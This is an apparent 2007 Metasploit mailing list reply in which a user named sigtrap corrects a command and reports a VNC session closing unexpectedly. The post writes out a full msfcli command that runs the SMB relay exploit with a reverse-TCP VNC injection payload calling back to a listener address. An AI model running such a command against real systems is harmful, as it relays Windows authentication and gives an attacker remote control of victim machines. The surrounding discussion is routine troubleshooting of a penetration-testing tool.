Metasploit mailing list archives

Re: smb_relay and vncinject

From: sigtrap at sigtrap.org (sigtrap)
Date: Mon, 10 Sep 2007 15:51:11 +0200

Wrong command. I was using the command below with another SMB relay
program... The VNC closes unexpectedly with the other SMB relay program
too (VNC was then started with msf psexec).
The command that I wanna use is:
./msfcli windows/smb/smb_relay DisableCourtesyShell=1 LHOST=169.254.133.7
PAYLOAD=windows/vncinject/reverse_tcp E

//Sigtrap